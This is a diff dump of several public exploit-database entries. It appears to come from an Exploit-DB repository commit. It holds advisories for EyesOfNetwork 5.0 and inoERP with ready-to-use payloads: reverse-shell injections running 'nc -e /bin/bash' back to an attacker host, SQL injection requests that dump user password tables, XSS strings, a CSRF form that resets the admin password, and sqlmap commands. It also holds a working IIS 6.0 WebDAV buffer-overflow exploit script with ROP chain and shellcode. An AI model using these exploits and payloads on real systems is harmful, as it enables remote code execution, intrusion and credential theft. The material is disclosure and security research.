# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# #ihsansencan
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
|
||||
# users
|
||||
# id
|
||||
# username
|
||||
# password
|
||||
# # # # #
|
132
platforms/php/webapps/41746.txt
Executable file
132
platforms/php/webapps/41746.txt
Executable file
|
@ -0,0 +1,132 @@
|
|||
# [CVE-2017-6087] EON 5.0 Remote Code Execution
|
||||
|
||||
## Description
|
||||
|
||||
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
|
||||
|
||||
## Remote Code Execution (authenticated)
|
||||
|
||||
The Eonweb code does not correctly filter arguments, allowing
|
||||
authenticated users to execute arbitrary code.
|
||||
|
||||
**CVE ID**: CVE-2017-6087
|
||||
|
||||
**Access Vector**: remote
|
||||
|
||||
**Security Risk**: high
|
||||
|
||||
**Vulnerability**: CWE-78
|
||||
|
||||
**CVSS Base Score**: 7.6
|
||||
|
||||
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
|
||||
|
||||
|
||||
### Proof of Concept 1
|
||||
|
||||
On the attacker's host, we start a handler:
|
||||
|
||||
```
|
||||
nc -lvp 1337
|
||||
```
|
||||
|
||||
The `selected_events` parameter is not correctly filtered before it is
|
||||
used by the `shell_exec()` function.
|
||||
|
||||
There, it is possible to inject a payload like in the request below,
|
||||
where we connect back to our handler:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The payload gets injected into the `$event[$key]` and `$ged_command`
|
||||
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
|
||||
|
||||
```
|
||||
$ged_command = "-update -type $ged_type_nbr ";
|
||||
foreach ($array_ged_packets as $key => $value) {
|
||||
if($value["type"] == true){
|
||||
if($key == "owner"){
|
||||
$event[$key] = $owner;
|
||||
}
|
||||
$ged_command .= "\"".$event[$key]."\" ";
|
||||
}
|
||||
}
|
||||
$ged_command = trim($ged_command, " ");
|
||||
shell_exec($path_ged_bin." ".$ged_command);
|
||||
```
|
||||
|
||||
Two other functions in this file are also affected by this problem:
|
||||
|
||||
* `delete($selected_events, $queue);`
|
||||
* `ownDisown($selected_events, $queue, $global_action);`
|
||||
|
||||
|
||||
### Proof of Concept 2
|
||||
|
||||
On the attacker's host, we start a handler:
|
||||
|
||||
```
|
||||
nc -lvp 1337
|
||||
```
|
||||
|
||||
The `module` parameter is not correctly filtered before it is used by
|
||||
the `shell_exec()` function.
|
||||
|
||||
Again, we inject our connecting back payload:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
In the `module/index.php` file, line 24, we can see that our payload is
|
||||
injected into the `exec()` function without any sanitization:
|
||||
|
||||
```
|
||||
# Check optionnal module to load
|
||||
if(isset($_GET["module"]) && isset($_GET["link"])) {
|
||||
|
||||
$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
|
||||
|
||||
# Redirect to module page if rpm installed
|
||||
if($module!=0) { header('Location: '.$_GET["link"].''); }
|
||||
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## Timeline (dd/mm/yyyy)
|
||||
|
||||
* 01/10/2016 : Initial discovery.
|
||||
* 09/10/2016 : Fisrt contact with vendor.
|
||||
* 23/10/2016 : Technical details sent to the security contact.
|
||||
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
|
||||
* 11/10/2016 : Testing the patch revealed that it needed more work.
|
||||
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
|
||||
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
|
||||
repsonsible disclosure agreement.
|
||||
* 14/03/2017 : Public disclosure.
|
||||
|
||||
Thank you to EON for the fast response.
|
||||
|
||||
## Solution
|
||||
|
||||
Update to version 5.1
|
||||
|
||||
## Affected versions
|
||||
|
||||
* Version <= 5.0
|
||||
|
||||
## Credits
|
||||
|
||||
* Nicolas SERRA <n.serra@sysdream.com>
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com>
|
||||
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
|
||||
* Website: https://sysdream.com/ *
|
||||
Twitter: @sysdream
|
172
platforms/php/webapps/41747.txt
Executable file
172
platforms/php/webapps/41747.txt
Executable file
|
@ -0,0 +1,172 @@
|
|||
# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
|
||||
|
||||
## Description
|
||||
|
||||
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
|
||||
|
||||
## SQL injection (authenticated)
|
||||
|
||||
The Eonweb code does not correctly filter arguments, allowing
|
||||
authenticated users to inject arbitrary SQL requests.
|
||||
|
||||
**CVE ID**: CVE-2017-6088
|
||||
|
||||
**Access Vector**: remote
|
||||
|
||||
**Security Risk**: medium
|
||||
|
||||
**Vulnerability**: CWE-89
|
||||
|
||||
**CVSS Base Score**: 6.0
|
||||
|
||||
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
|
||||
|
||||
### Proof of Concept 1 (root privileges)
|
||||
|
||||
The following HTTP request allows an attacker (connected as
|
||||
administrator) to dump the database contents using SQL injections inside
|
||||
either the `bp_name` or the `display` parameter. These requests are
|
||||
executed with MySQL root privileges.
|
||||
|
||||
```
|
||||
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
|
||||
|
||||
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 114:
|
||||
|
||||
```
|
||||
function list_process($bp,$display,$bdd){
|
||||
$sql = "select name from bp where is_define = 1 and name!='".$bp."'
|
||||
and priority = '" . $display . "'";
|
||||
$req = $bdd->query($sql);
|
||||
$process = $req->fetchall();
|
||||
|
||||
echo json_encode($process);
|
||||
}
|
||||
```
|
||||
|
||||
### Proof of Concept 2
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `type` parameter:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
|
||||
```
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ajax.php` file, line 64:
|
||||
|
||||
```
|
||||
if($_GET["type"] == 0){
|
||||
$ged_where = "WHERE pkt_type_id!='0'";
|
||||
} else {
|
||||
$ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
|
||||
}
|
||||
$gedsql_result1=sqlrequest($database_ged,"SELECT
|
||||
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
|
||||
```
|
||||
|
||||
### Proof of Concept 3
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `search` parameter:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
|
||||
```
|
||||
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 129.
|
||||
|
||||
```
|
||||
if($search != ""){
|
||||
$like = "";
|
||||
if( substr($search, 0, 1) === '*' ){
|
||||
$like .= "%";
|
||||
}
|
||||
$like .= trim($search, '*');
|
||||
if ( substr($search, -1) === '*' ) {
|
||||
$like .= "%";
|
||||
}
|
||||
|
||||
$where_clause .= " AND $filter LIKE '$like'";
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
### Proof of Concept 4
|
||||
|
||||
The following HTTP request allows an attacker to dump the database
|
||||
contents using SQL injections inside the `equipment` parameter:
|
||||
|
||||
```
|
||||
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
|
||||
1)&queue=history
|
||||
```
|
||||
|
||||
|
||||
#### Vulnerable code
|
||||
|
||||
The vulnerable code can be found inside the
|
||||
`module/monitoring_ged/ged_functions.php` file, line 493:
|
||||
|
||||
```
|
||||
$gedsql_result1=sqlrequest($database_ged,"SELECT
|
||||
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
|
||||
pkt_type_id<'100';");
|
||||
|
||||
|
||||
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
|
||||
$sql = "SELECT DISTINCT $filter FROM
|
||||
".$ged_type["pkt_type_name"]."_queue_".$queue;
|
||||
|
||||
$results = sqlrequest($database_ged, $sql);
|
||||
while($result = mysqli_fetch_array($results)){
|
||||
if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
|
||||
array_push($datas, $result[$filter]);
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## Timeline (dd/mm/yyyy)
|
||||
|
||||
* 01/10/2016 : Initial discovery.
|
||||
* 09/10/2016 : Fisrt contact with vendor.
|
||||
* 23/10/2016 : Technical details sent to the security contact.
|
||||
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
|
||||
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
|
||||
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
|
||||
repsonsible disclosure agreement.
|
||||
* 14/03/2017 : Public disclosure.
|
||||
|
||||
Thank you to EON for the fast response.
|
||||
|
||||
## Solution
|
||||
|
||||
Update to version 5.1.
|
||||
|
||||
## Affected versions
|
||||
|
||||
* Version <= 5.0
|
||||
|
||||
## Credits
|
||||
|
||||
* Nicolas SERRA <n.serra@sysdream.com>
|
||||
|
||||
-- SYSDREAM Labs <labs@sysdream.com>
|
||||
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
|
||||
* Website: https://sysdream.com/
|
||||
* Twitter: @sysdream
|
157
platforms/php/webapps/41749.txt
Executable file
157
platforms/php/webapps/41749.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
=== FOXMOLE - Security Advisory 2017-01-25 ===
|
||||
|
||||
inoERP - Multiple Issues
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Affected Versions
|
||||
=================
|
||||
inoERP 0.6.1
|
||||
|
||||
Issue Overview
|
||||
==============
|
||||
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
|
||||
Technical Risk: critical
|
||||
Likelihood of Exploitation: medium
|
||||
Vendor: inoERP
|
||||
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP
|
||||
Credits: FOXMOLE employee Tim Herres
|
||||
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
|
||||
Advisory Status: Public
|
||||
OVE-ID: OVE-20170126-0002
|
||||
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|
||||
|
||||
|
||||
Impact
|
||||
======
|
||||
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
|
||||
An attacker could use the SQL Injection to access the database in an unsafe way.
|
||||
This means there is a high impact to all applications.
|
||||
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
|
||||
|
||||
|
||||
Issue Description
|
||||
=================
|
||||
The following findings are only examples, there are quite more. The whole application should be reviewed.
|
||||
|
||||
All items tested using FF52.
|
||||
|
||||
1.) Cross Site Scripting:
|
||||
Stored:
|
||||
Create a new Question in the -->Forum --> Ask a question
|
||||
Vulnerable fields : Title, Content
|
||||
Used Payload: Test<script>alert("xss")</script>
|
||||
|
||||
Response:
|
||||
[...]
|
||||
<title>Test<script>alert("xss")</script> - inoERP!</title>
|
||||
[...]
|
||||
|
||||
The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
|
||||
|
||||
Reflected:
|
||||
With Auth:
|
||||
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
|
||||
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
|
||||
%3C/scRipt%3E
|
||||
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
|
||||
|
||||
Unauthenticated:
|
||||
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
|
||||
|
||||
2.) No protection against Cross Site Request Forgery Attacks:
|
||||
PoC: Changing the admin user credentials.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
|
||||
<input type="hidden" name="headerData[0][name]" value="user_id[]" />
|
||||
<input type="hidden" name="headerData[0][value]" value="1" />
|
||||
<input type="hidden" name="headerData[1][name]" value="username[]" />
|
||||
<input type="hidden" name="headerData[1][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[2][name]" value="enteredPassword[]" />
|
||||
<input type="hidden" name="headerData[2][value]" value="test" />
|
||||
<input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" />
|
||||
<input type="hidden" name="headerData[3][value]" value="test" />
|
||||
<input type="hidden" name="headerData[4][name]" value="first_name[]" />
|
||||
<input type="hidden" name="headerData[4][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[5][name]" value="last_name[]" />
|
||||
<input type="hidden" name="headerData[5][value]" value="inoerp" />
|
||||
<input type="hidden" name="headerData[6][name]" value="email[]" />
|
||||
<input type="hidden" name="headerData[6][value]" value="inoerp@no-site.com" />
|
||||
<input type="hidden" name="headerData[7][name]" value="phone[]" />
|
||||
[..snipped...]
|
||||
|
||||
If a privileged user activates the request, the admin user id=1 is set to "test".
|
||||
|
||||
3.) SQL Injection:
|
||||
Auth required:No
|
||||
#####
|
||||
http://192.168.241.143/inoerp/form.php?
|
||||
Parameter: module_code (GET)
|
||||
Type: boolean-based blind
|
||||
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
|
||||
GROUP BY clause
|
||||
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
|
||||
0x74657374 ELSE 0x28 END))-- qkmO
|
||||
|
||||
Type: error-based
|
||||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
|
||||
GROUP BY clause (FLOOR)
|
||||
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
|
||||
COUNT(*),CONCAT(0x716b7a6271,(SELECT
|
||||
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
|
||||
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
|
||||
|
||||
Type: stacked queries
|
||||
Title: MySQL > 5.0.11 stacked queries (comment)
|
||||
Payload: module_code=test';SELECT SLEEP(5)#
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: module_code=test' OR SLEEP(5)-- STgC
|
||||
|
||||
Exploitable using e.g. SQLMAP
|
||||
|
||||
Blind SQL Injection:
|
||||
sqlmap -u
|
||||
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
|
||||
-p "content_type%5b%5d" --dbms="MySQL"
|
||||
Parameter: content_type[] (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause
|
||||
Payload: content_type[]=-8366' OR 7798=7798 AND
|
||||
'eanR'='eanR&search_text=3&search_document_list[]=all
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: content_type[]=test' OR SLEEP(5) AND
|
||||
'exIO'='exIO&search_text=3&search_document_list[]=all
|
||||
#####
|
||||
|
||||
4.) Session Fixation:
|
||||
After a successful login the SessionID PHPSESSID remains the same:
|
||||
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
|
||||
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
|
||||
|
||||
|
||||
|
||||
|
||||
Temporary Workaround and Fix
|
||||
============================
|
||||
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
|
||||
|
||||
|
||||
|
||||
History
|
||||
=======
|
||||
2017-01-25 Issue discovered
|
||||
2017-01-26 Vendor contacted -> no response
|
||||
2017-02-20 Vendor contacted again -> no response
|
||||
2017-03-06 Vendor contacted again -> no response
|
||||
2017-03-27 Advisory Release
|
||||
|
||||
|
||||
GPG Signature
|
||||
=============
|
||||
This advisory is signed with the GPG key of the FOXMOLE advisories team.
|
||||
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
|
177
platforms/windows/dos/41734.c
Executable file
177
platforms/windows/dos/41734.c
Executable file
File diff suppressed because one or more lines are too long
51
platforms/windows/dos/41737.txt
Executable file
51
platforms/windows/dos/41737.txt
Executable file
|
@ -0,0 +1,51 @@
|
|||
[+] Title: Disk Sorter Server v9.5.12 - Local Stack-based buffer overflow
|
||||
[+] Credits / Discovery: Nassim Asrir
|
||||
[+] Author Email: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||
[+] Author Company: Henceforth
|
||||
[+] CVE: N/A
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
|
||||
http://www.disksorter.com/
|
||||
|
||||
|
||||
Download:
|
||||
===========
|
||||
|
||||
http://www.disksorter.com/setups/disksortersrv_setup_v9.5.12.exe
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
|
||||
local stack-based buffer overflow
|
||||
|
||||
|
||||
POC:
|
||||
===================
|
||||
|
||||
Launch the program click on :
|
||||
|
||||
1 - Server
|
||||
|
||||
2 - Connect
|
||||
|
||||
3 - and in the Share Name field inject (5000 "A") then the program crashed see the picture.
|
||||
|
||||
CVE Reference:
|
||||
===============
|
||||
|
||||
N/A
|
||||
|
||||
|
||||
Tested on:
|
||||
===============
|
||||
|
||||
Windows 7
|
||||
|
||||
Win xp
|
||||
|
||||
|
||||
|
||||
|
45
platforms/windows/remote/41738.py
Executable file
45
platforms/windows/remote/41738.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
'''
|
||||
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
||||
|
||||
Additional Information: the ScStoragePathFromUrl function is called twice
|
||||
Vulnerability Type: Buffer overflow
|
||||
Vendor of Product: Microsoft
|
||||
Affected Product Code Base: Windows Server 2003 R2
|
||||
Affected Component: ScStoragePathFromUrl
|
||||
Attack Type: Remote
|
||||
Impact Code execution: true
|
||||
Attack Vectors: crafted PROPFIND data
|
||||
|
||||
Has vendor confirmed or acknowledged the vulnerability?:true
|
||||
|
||||
Discoverer:Zhiniang Peng and Chen Wu.
|
||||
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
|
||||
'''
|
||||
|
||||
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
|
||||
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
|
||||
#-----------Email: edwardz@foxmail.com
|
||||
|
||||
import socket
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.connect(('127.0.0.1',80))
|
||||
|
||||
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
|
||||
pay+='If: <http://localhost/aaaaaaa'
|
||||
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
|
||||
pay+='>'
|
||||
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
|
||||
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
|
||||
|
||||
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
|
||||
|
||||
pay+=shellcode
|
||||
pay+='>\r\n\r\n'
|
||||
print pay
|
||||
|
||||
sock.send(pay)
|
||||
data = sock.recv(80960)
|
||||
|
||||
print data
|
||||
sock.close
|
Loading…
Add table
Reference in a new issue